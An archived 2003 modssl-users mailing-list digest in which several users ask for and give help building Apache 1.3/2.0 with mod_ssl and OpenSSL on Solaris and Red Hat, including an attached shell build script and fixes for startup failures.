	by blv-hub-01.boeing.com (8.11.3/8.11.3/MBS-LDAP-01) with ESMTP id h2CGvJe14566
	for ; Wed, 12 Mar 2003 08:57:19 -0800 (PST)
Received: from localhost (dodge@localhost)
	by cruciate.ca.boeing.com (8.9.3+Sun/8.9.3) with ESMTP id IAA19165
	for ; Wed, 12 Mar 2003 08:57:17 -0800 (PST)
Date: Wed, 12 Mar 2003 08:57:16 -0800 (PST)
From: "John P. Dodge" 
X-X-Sender: dodge@cruciate
To: modssl-users@modssl.org
Subject: Re: Help on Apache 2.0.43 + SSL installation
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John P. Dodge" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 12 Mar 2003, Cliff Woolley wrote:

>
> I'm cc:ing the users list so that the response is in the archives in case
> anyone else has a similar problem.
>
>
> On Sat, 8 Mar 2003, Kitty Ko wrote:
>
> > How are you? I read accross one of your email replay on the "binding
> > shared libraries with OpenSSL" on the interent, and that's how I got
> > your email address.
> >
> > I have encounter problems while installing SSL + APACHE.  I am wonderin=
g
> > if you can give me some hits.
> >
> > I have successfully completed installing Tomcat 4.0.6 + Apache 2.0.43 o=
n
> > the Unix box.  Buy I can't have SSL installed.  FYI.  I build apache an=
d
> > open ssl form source.
> >
> > After I extracted the openssl-0.9.7, I did the following:
> >
> > # cd openssl-0.9.7
> >
> > # ./config --prefix=3D/depot/ssl/install
> > --openssldir=3D/depot/ssl/install/openssl
> >
> > # make
> >
> > However, once I get into make build-shared, i got the following errors:
> >
> > ld:fetal: relocations remain against allocatable but non-writable
> > sections colletc2:  ld returned 1 exit status
> >
> > make: ***[do-solars-shared] Error 1
> >
> > My questions are:
> >
> > 1.  how to fix this compile error
>
> Hmmm... well honestly I'm not all that familiar with linker problems on
> Solaris.  I have heard a number of people report problems getting the
> shared library build of openssl to work on Solaris, though that's about a=
s
> much insight as I can offer.  The option to use both a static openssl and
> a static mod_ssl remains, of course, and at this point sounds like your
> best option.
>
> > 2.  how do i know if I compiled mod_ssl statically or dynamicelly?
>
> "httpd -l" will list all the statically-compiled modules.
>
> > I build the apache by the following command:
> >
> > # ./configure --with-layout=3DApache --prefix=3D/depot/apache2
> > --enable-mods-shared=3Dmost --enable-ssl=3Dshared
>                             ^^^^^^^^^^^^^^^^^^^
>
> ...though this right here tells me you've built it as shared, since that'=
s
> what that means.  :)
>
> --Cliff
>
For the openssl compile (with gcc) use:

=2E/config --prefix=3D shared threads no-idea '-fPIC'


Then build Apache 2.x:

=2E/configure --with-layout=3DApache --prefix=3D/depot/apache2 \
--enable-mods-shared=3Dmost \
--with-ssl=3D \
--enable-ssl=3Dshared

make ; make install

Note when using gcc on Solaris you may run across a dependency on libgcc.a
(__floatdisf, --floatdidf,...).

Set SH_LDFLAGS=3D`gcc -print-libgcc-file-name` ; ./configure...

This shlould be all you need.

Note: Use the linker (ld) in /usr/ccs/bin

----------------------------------------
"Mon a=E9roglisseur est plein d'anguilles"
John P. Dodge
Boeing Shared Services
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:50:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8FDAF2AA05D; Tue, 18 Mar 2003 15:50:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 3A4532AA055; Tue, 18 Mar 2003 15:50:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from webserver.learningvoyage.com (ddsl-216-196-239-90.fuse.net [216.196.239.90])
	by master.modssl.org (Postfix) with SMTP id BE86D2AA01F
	for ; Thu, 13 Mar 2003 17:44:13 +0100 (CET)
Received: (qmail 15801 invoked by alias); 13 Mar 2003 16:31:01 -0000
Received: from mburkhouse@learningvoyage.com by webserver by uid 501 with qmail-scanner-1.15 
 (clamscan: 0.53. spamassassin: 2.43.  Clear:. 
 Processed in 0.328472 secs); 13 Mar 2003 16:31:01 -0000
X-Qmail-Scanner-Mail-From: mburkhouse@learningvoyage.com via webserver
X-Qmail-Scanner: 1.15 (Clear:. Processed in 0.328472 secs)
Received: from unknown (HELO mburkhouse) (10.0.1.1)
  by 0 with SMTP; 13 Mar 2003 16:31:00 -0000
From: "Mike Burkhouse" 
To: 
Subject: httpsd doesn't start
Date: Thu, 13 Mar 2003 11:42:20 -0500
Organization: Learning Voyage, Inc.
Message-ID: <005d01c2e97f$84337b40$1501000a@mburkhouse>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_005E_01C2E955.9B5D7340"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Burkhouse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_005E_01C2E955.9B5D7340
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi All,

=20

I saw a couple of references to this problem in the archives, but none =
of
the solutions there solved my problem.

=20

I am running:

=20

Red Hat 7.3

Apache 2.0.44

OpenSSL 0.9.7

=20

1) I have a pretty vanilla httpd.conf  running only one site and I am =
trying
to set up a secure virtual site in /apache2/htdocs/secureSite/ .=20

=20

2) I created my key and self-signed cert in /apache2/conf/ .

=20

3) I configured apache2/conf/ssl.conf to point to the correct key and =
cert
and with the correct path to the directory that I want to serve =
documents
from

=20

I stop httpd and run apachectl startssl with no complaints, but only =
httpd
starts, not httpsd, and nothing gets logged.  I have no idea how to =
track
down what has gone wrong.  Can anyone offer any suggestions where to =
look?=20

=20

Sorry if this is not enough information - if you tell me what else you =
need,
I am happy to provide it to you.

=20

Thanks,

=20

Mike


------=_NextPart_000_005E_01C2E955.9B5D7340
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















Hi All,



 



I saw a couple of references to this problem in the
archives, but none of the solutions there solved my =
problem.



 



I am running:



 



Red Hat 7.3



Apache 2.0.44



OpenSSL 0.9.7



 



1) I have a pretty vanilla httpd.conf  running =
only one
site and I am trying to set up a secure virtual site in =
/apache2/htdocs/secureSite/
. 



 



2) I created my key and self-signed cert in =
/apache2/conf/ .



 



3) I configured apache2/conf/ssl.conf to point to the
correct key and cert and with the correct path to the directory that I =
want to
serve documents from



 



I stop httpd and run apachectl startssl with no =
complaints,
but only httpd starts, not httpsd, and nothing gets logged.  I have =
no
idea how to track down what has gone wrong.  Can anyone offer any
suggestions where to look? 



 



Sorry if this is not enough information – if =
you tell
me what else you need, I am happy to provide it to =
you.



 



Thanks,



 



Mike









------=_NextPart_000_005E_01C2E955.9B5D7340--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:50:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 59BF12AA052; Tue, 18 Mar 2003 15:50:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 19D6C2AA04B; Tue, 18 Mar 2003 15:50:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from web10508.mail.yahoo.com (web10508.mail.yahoo.com [216.136.130.158])
	by master.modssl.org (Postfix) with SMTP id 978D12AA02C
	for ; Thu, 13 Mar 2003 18:46:57 +0100 (CET)
Message-ID: <20030313174654.54458.qmail@web10508.mail.yahoo.com>
Received: from [66.108.141.135] by web10508.mail.yahoo.com via HTTP; Thu, 13 Mar 2003 09:46:53 PST
Date: Thu, 13 Mar 2003 09:46:53 -0800 (PST)
From: "John van V." 
Subject: Apache 2.x SSL failing -- "no listening sockets available, shutting down"
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John van V." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello, I have attempted several times on 2 platforms to install and run Apache
SSL. Linux PPC and Linux Redhat8.0

This is the build source -- httpd-2.0.44.tar.gz

I followed various ./configuration options and here are the last tried:

configured by ./configure, generated by GNU Autoconf 2.54,
  with options \"'from config.status : '--prefix=/opt/apache'
'--enable-mods-shared=most' '--enable-ssl=shared'\"

I started apache on port 443, normal style.  Infact, if failed as soon as I
added 

I wondered, of course, if some mod_ssl package is requried in the mod
structure,  but found no documentation for Apache 2.x to that effect anywhere I
looked.

== Errors ==
../bin/apachectl start  
no listening sockets available, shutting down
Unable to open logs
============

I asked on the generic apache users list, no answer.

I am actually getting pretty concerned.  This is a secure server, it doesn't
work and nobody seems to care.  Many, many operations depend on this.



=====
CXN, Inc. Contact: john@thinman.com
President, The Linux Society
http://groups.yahoo.com/group/linux-society
linux society distro -> http://www.thinman.com/eLSD/readme
ThinMan is a registered trademark of CXN, Inc

__________________________________________________
Do you Yahoo!?
Yahoo! Web Hosting - establish your business online
http://webhosting.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:51:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 27B752AA038; Tue, 18 Mar 2003 15:51:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id C9FF62AA020; Tue, 18 Mar 2003 15:51:31 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from relay2.bt.net (relay2.bt.net [194.72.6.62])
	by master.modssl.org (Postfix) with ESMTP id 0AADC2AA015
	for ; Fri, 14 Mar 2003 12:49:27 +0100 (CET)
Received: from whmr18.ing-barings.com ([194.128.222.11])
	by relay2.bt.net with esmtp (Exim 3.22 #1)
	id 18tngg-0004of-00
	for modssl-users@modssl.org; Fri, 14 Mar 2003 11:49:22 +0000
Received: from ldnxch05.nt.eur.barings.ing (unverified) by WHMR18.ing-barings.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Fri, 14 Mar 2003 11:56:16 +0000
Received: from ldnxch02.eur.barings.ing (unverified) by 
    ldnxch05.nt.eur.barings.ing (Content Technologies SMTPRS 4.3.1) with 
    ESMTP id  for 
    ; Fri, 14 Mar 2003 11:49:22 +0000
Received: by LDNXCH02 with Internet Mail Service (5.5.2653.19) id ; 
    Fri, 14 Mar 2003 11:49:24 -0000
Message-ID: <11328F863DFEB3459BC88430382EB6B735B3F9@LDNXCH07>
From: Martin.Evans@UK.ING.COM
To: modssl-users@modssl.org
Subject: problem building mod_ssl with apache2.0.44 openssl 0.9.6 solaris9
Date: Fri, 14 Mar 2003 11:49:23 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin.Evans@UK.ING.COM
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I've seen a couple of articles where people have had problems with the
above, can anyone suggest a version of ssl that works ok, I used the ssl
package from the sun freeware site and installed via pkgadd, built apache
from source with gcc.

config command,

./configure --prefix=blah --enable-ssl -with-ssl /usr/local/ssl

I'm getting the same vhost.c line 232 error as others.

Thanks in advance,

Martin Evans


------------------------------------------------------------------------------
The information in this Internet email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this Internet email by anyone else is unauthorised.
If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this Internet email are subject to the terms and conditions expressed in any applicable governing ING terms of business or client engagement letter.
Visit us at www.ing.com
------------------------------------------------------------------------------
01
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:51:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 600502AA054; Tue, 18 Mar 2003 15:51:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 04A602AA052; Tue, 18 Mar 2003 15:51:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from jake.micromuse.co.uk (mailhost.micromuse.com [194.131.185.75])
	by master.modssl.org (Postfix) with ESMTP id B45A62AA015
	for ; Fri, 14 Mar 2003 17:33:24 +0100 (CET)
Received: from micromuse.com ([192.168.39.181])
	by jake.micromuse.co.uk (Switch-2.1.0/Switch-2.1.0) with ESMTP id h2EGV7Q17740
	for ; Fri, 14 Mar 2003 16:31:07 GMT
Message-ID: <3E7203B5.50601@micromuse.com>
Date: Fri, 14 Mar 2003 16:30:45 +0000
From: Stuart Cook 
Organization: Miucromuse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02
X-Accept-Language: en, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Installation Woes
References: <11328F863DFEB3459BC88430382EB6B735B403@LDNXCH07>
Content-Type: multipart/mixed;
 boundary="------------080108040903020406040906"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stuart Cook 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------080108040903020406040906
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I have attached a build script I use to make Apache 1.3.27 with SSL. 
Maybe this will be useful.

Regards,

Stuart

---

Martin.Evans@UK.ING.COM wrote:
> Rick,
> 
> been fighting with it myself today, I'm using Solaris but if you run httpd
> -l it will tell you what modules were compiled into your build, if mod_ssl
> isn't there you'll either have to rebuild with mod_ssl or load the module
> dynamically. 
> 
> -----Original Message-----
> From: Rick Root [mailto:rroot@wakeinternet.com]
> Sent: Friday, March 14, 2003 3:46 PM
> To: modssl-users@modssl.org
> Subject: Installation Woes
> 
> 
> Hi folks.. I'm a newbie here, installing Apache and OpenSSL and mod_ssl 
> from source on my RedHat 7.3 (I uninstalled the RPMS)
> 
> Call me stupid, but I must be missing something...
> 
> The installation instructions are pretty straightforward but I have one 
> major problem - the httpd.conf doesn't include ANY ssl configuration 
> options after it's installed.
> 
> So of course, SSL doesn't work.
> 
> The instructions seem to assume that the SSL configuration options will 
> be there.  This left me really confused.
> 
> I ripped out some code from another httpd.conf but now I've got it 
> responding to SSL on port 80 as well as 443.
> 
> What I'm looking for is BASIC instructions on how to configure apache to 
> use SSL (and maybe someone can tell me why it's not IN the instructions 
> in the first place).  I've looked in the FAQ and the reference guide but 
> I haven't had any luck yet.
> 
> Downloaded everything today - apache 1.3.27, open_ssl 0.9.7a, and 
> mod_ssl 2.8.12
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
> ------------------------------------------------------------------------------
> The information in this Internet email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this Internet email by anyone else is unauthorised.
> If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this Internet email are subject to the terms and conditions expressed in any applicable governing ING terms of business or client engagement letter.
> Visit us at www.ing.com
> ------------------------------------------------------------------------------
> 01
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 


-- 
--------------------------------------------
  Stuart V Cook BSc. (Hons)
  Senior Software Consultant - Micromuse Ltd.
  90 Putney Bridge Rd, London. SW18 1DA. UK
  Office: +44-(0)20-8875 9500 x734
  Mobile: +44-(0)7771 816 472
--------------------------------------------

--------------080108040903020406040906
Content-Type: text/plain;
 name="build_apache.sh"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="build_apache.sh"

#!/bin/sh

if [ $# -lt 1 ]; then
	echo "Usage:"
	echo "\t$0 "
	exit 1
fi

if [ -n "$2" ]; then
	ROOTPATH=$2
fi

if [ -n "$ROOTPATH}" ]; then
	MASTER_PATH="${ROOTPATH}/master/apache_1.3.27"
	BUILD_PATH="${ROOTPATH}/${1}/apache"
	OPENSSL_PATH="${ROOTPATH}/openssl-engine-0.9.6g"
	# MM_PATH="${ROOTPATH}/mm-1.2.1"
	MOD_SSL_PATH="${ROOTPATH}/mod_ssl-2.8.12-1.3.27"
else
	echo "ERROR: Please specify root path to files."
	exit 1
fi


################################
# Build Open Secure Socket Layer
################################
cd $OPENSSL_PATH
echo "Changed to directory `pwd`"
echo "Configuring OpenSSL..."

echo "Executing \"sh config no-idea no-threads\""

RES=`sh config no-idea no-threads 2>&1`
if [ $? -gt 0 ]; then
	echo "Failed to configure OpenSSL becauase:\n$RES" | more
	exit 1
fi

echo "Cleaning up any previous builds..."
echo "Executing \"make clean\""

RES=`make clean 2>&1`

echo "Making OpenSSL..."
echo "Executing \"make\""

RES=`make 2>&1`
if [ $? -gt 0 ]; then
	echo "Failed to make OpenSSL because:\n$RES" | more
	exit 3
fi


#############################
# Build Shared Memory Library
#############################
# cd $MM_PATH
# echo "Changed to directory `pwd`"
# echo "Configuring Shared Memory Library..."

# echo "Executing \"./configure --disable-shared\""

# RES=`./configure --disable-shared 2>&1`
# if [ $? -gt 0 ]; then
	# echo "Failed to configure Shared Memory Library becauase:\n$RES" | more
	# exit 1
# fi

# echo "Cleaning up any previous builds..."
# echo "Executing \"make clean\""

# RES=`make clean 2>&1`

# echo "Making Shared Memory Library..."
# echo "Executing \"make\""

# RES=`make 2>&1`
# if [ $? -gt 0 ]; then
	# echo "Failed to make Shared Memory Library because:\n$RES" | more
	# exit 3
# fi


########################################
# Configure Secure Socket Library Module
########################################
cd $MOD_SSL_PATH
echo "Changed to directory `pwd`"
echo "Configuring Secure Socket Library Module..."

CMD="./configure --with-apache=${MASTER_PATH} --with-ssl=${OPENSSL_PATH} --prefix=${BUILD_PATH} --enable-module=so"

echo "Executing \"${CMD}\""

RES=`${CMD} 2>&1`
if [ $? -gt 0 ]; then
	echo "Failed to configure Secure Socket Library Module becauase:\n$RES" | more
	exit 1
fi


#########################
# Build Apache Web Server
#########################
cd $MASTER_PATH
echo "Changed to directory `pwd`"
echo "Building Apache..."

echo "Cleaning up any previous builds..."
echo "Executing \"make clean\""

RES=`make clean 2>&1`

echo "Making Apache Web Server..."
echo "Executing \"make\""

RES=`make 2>&1`
if [ $? -gt 0 ]; then
	echo "Failed to make because:\n$RES" | more
	exit 3
fi

echo "Making SSL dummy certificate..."
echo "Executing \"make certificate\""

RES=`make certificate TYPE=dummy 2>&1`

echo "Installing Apache..."
echo "Executing \"make install\""

RES=`make install 2>&1`
if [ $? -gt 0 ]; then
	echo "Failed to make installation because:\n$RES" | more
	exit 4
fi

cd $MASTER_PATH

echo "Finished for apache build for platform $1"
echo

--------------080108040903020406040906--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 15:51:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 64AEF2AA05F; Tue, 18 Mar 2003 15:51:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 1FF032AA05D; Tue, 18 Mar 2003 15:51:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Received: from bg.netclime.com (iris-gw.customer.0rbitel.net [195.24.34.94])
	by master.modssl.org (Postfix) with SMTP id BF7D82AA028
	for ; Fri, 14 Mar 2003 17:37:53 +0100 (CET)
Received: (qmail 15460 invoked from network); 14 Mar 2003 16:37:47 -0000
Received: from c-kosta.iris.bg (HELO sysadmin) (192.168.0.64)
  by mail.iris.bg with SMTP; 14 Mar 2003 16:37:47 -0000
Message-ID: <0ea101c2ea48$0bcaa510$4000a8c0@iris.bg>
From: "Kostadin Galabov" 
To: 
Subject: Apache 1.3.26 + mod_ssl 2.8.10 + OpenSSL 0.9.7a + ubsec engine questions
Date: Fri, 14 Mar 2003 18:37:47 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kostadin Galabov" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Currently I'm setting up a Broadcom 5820 accelerator on company's web
server. Everything seem to work. I compiled mod_ssl with enabled
experimental code, when I start the apache the module for the broadcom
card gets used. When I do requests to the apache, the statistic program
of broadcom card show that the card is used. Everything seems fine. But
I stress test the apache and to my surprise the result doesn't look good
at all:
27 hits/sec without broadcom card
28 hits/sec with broadcom card (ubsec engine).
So I suppose something in my config is wrong or the card is unusable.
So I'm asking for help if someone has ever made apache working with
ubsec engine and similar card and does he have similar results. And if
someone has better results what he did in order to achieve them. Here is
my setup:

Slackware Linux 8.1
Apache 1.3.26 + mod_ssl 2.8.10 + OpenSSL 0.9.7a
bcm 1.81 driver


Regards
Kostadin Galabov
System Administrator
Netclime Inc.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 18:00:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9A99F2AA035; Tue, 18 Mar 2003 18:00:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smx-chi04.fnis.com (smtp01.microgeneral.com [206.54.145.18])
	by master.modssl.org (Postfix) with ESMTP id ABFD92AA015
	for ; Tue, 18 Mar 2003 18:00:10 +0100 (CET)
Received: from MailHUB1.fnf.com ([10.10.4.13]) by 10.248.61.37 with InterScan Messaging Security Suite; Tue, 18 Mar 2003 11:00:18 -0600
Received: by mailhub1.fnf.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 18 Mar 2003 08:59:34 -0800
Message-ID: 
From: "Mitchell, Edmund" 
To: "'modssl-users@modssl.org'" 
Subject: RE: httpsd doesn't start
Date: Tue, 18 Mar 2003 08:54:19 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2ED6F.0474C730"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mitchell, Edmund" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2ED6F.0474C730
Content-Type: text/plain;
	charset="iso-8859-1"

I was in your exact boat yesterday, (except I use RH 8), and my problem
turned out to 
be that the default, out-of-the-box ssl.conf file has ssl logging to
logs/whateverLogFile, 
and I don't have a logs subdirectory where I keep my ssl.conf.  
 
I commented out all the logging lines (and hopefully everything will work
when I replace 
them with the real paths to the real logs) and it started up right away with

/usr/sbin/httpd -k start -DSSL.
 
I wish it would have complained about this everytime I tried to start it up
rather than 
just returning a prompt as if everything was fine...
 
HTH

E

-----Original Message-----
From: Mike Burkhouse [mailto:mburkhouse@learningvoyage.com]
Sent: Thursday, March 13, 2003 11:42 AM
To: modssl-users@modssl.org
Subject: httpsd doesn't start



Hi All,

 

I saw a couple of references to this problem in the archives, but none of
the solutions there solved my problem.

 

I am running:

 

Red Hat 7.3

Apache 2.0.44

OpenSSL 0.9.7

 

1) I have a pretty vanilla httpd.conf  running only one site and I am trying
to set up a secure virtual site in /apache2/htdocs/secureSite/ . 

 

2) I created my key and self-signed cert in /apache2/conf/ .

 

3) I configured apache2/conf/ssl.conf to point to the correct key and cert
and with the correct path to the directory that I want to serve documents
from

 

I stop httpd and run apachectl startssl with no complaints, but only httpd
starts, not httpsd, and nothing gets logged.  I have no idea how to track
down what has gone wrong.  Can anyone offer any suggestions where to look? 

 

Sorry if this is not enough information - if you tell me what else you need,
I am happy to provide it to you.

 

Thanks,

 

Mike


------_=_NextPart_001_01C2ED6F.0474C730
Content-Type: text/html;
	charset="iso-8859-1"











I was in your 
exact boat yesterday, (except I use RH 8), and my problem turned out to 



be that the 
default, out-of-the-box ssl.conf file has ssl logging to logs/whateverLogFile, 



and I don't 
have a logs subdirectory where I keep my ssl.conf.  


 


I commented 
out all the logging lines (and hopefully everything will work when I replace 



them with the 
real paths to the real logs) and it started up right away with 



/usr/sbin/httpd -k start -DSSL.


 


I wish it 
would have complained about this everytime I tried to start it up rather than 



just 
returning a prompt as if everything was fine...


 


HTH

E



  
-----Original Message-----
From: Mike Burkhouse 
  [mailto:mburkhouse@learningvoyage.com]
Sent: Thursday, March 13, 
  2003 11:42 AM
To: modssl-users@modssl.org
Subject: httpsd 
  doesn't start


  

  
Hi All,

  
 

  
I saw a couple of references to 
  this problem in the archives, but none of the solutions there solved my 
  problem.

  
 

  
I am running:

  
 

  
Red Hat 7.3

  
Apache 2.0.44

  
OpenSSL 0.9.7

  
 

  
1) I have a pretty vanilla 
  httpd.conf  running only one site and I am trying to set up a secure 
  virtual site in /apache2/htdocs/secureSite/ . 

  
 

  
2) I created my key and 
  self-signed cert in /apache2/conf/ .

  
 

  
3) I configured 
  apache2/conf/ssl.conf to point to the correct key and cert and with the 
  correct path to the directory that I want to serve documents 
  from

  
 

  
I stop httpd and run apachectl 
  startssl with no complaints, but only httpd starts, not httpsd, and nothing 
  gets logged.  I have no idea how to track down what has gone wrong.  
  Can anyone offer any suggestions where to look? 

  
 

  
Sorry if this is not enough 
  information - if you tell me what else you need, I am happy to provide it to 
  you.

  
 

  
Thanks,

  
 

  
Mike


------_=_NextPart_001_01C2ED6F.0474C730--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 18:32:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8976E2AA051; Tue, 18 Mar 2003 18:32:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (bistromath2.cs.Virginia.EDU [128.143.137.216])
	by master.modssl.org (Postfix) with ESMTP id AD0322AA04B
	for ; Tue, 18 Mar 2003 18:32:54 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h2IHITvo002014
	for ; Tue, 18 Mar 2003 12:18:30 -0500
Date: Tue, 18 Mar 2003 12:18:29 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: httpsd doesn't start
In-Reply-To: <005d01c2e97f$84337b40$1501000a@mburkhouse>
Message-ID: 
References: <005d01c2e97f$84337b40$1501000a@mburkhouse>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 13 Mar 2003, Mike Burkhouse wrote:

> I stop httpd and run apachectl startssl with no complaints, but only
> httpd starts, not httpsd, and nothing gets logged.  I have no idea how
> to track down what has gone wrong.  Can anyone offer any suggestions
> where to look?

There's no such thing as httpsd under Apache 2.0.x.  That's an
Apache-SSL-ism, and Apache2 uses mod_ssl.  HTTP and HTTPS are served by
the same daemon process(es).

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
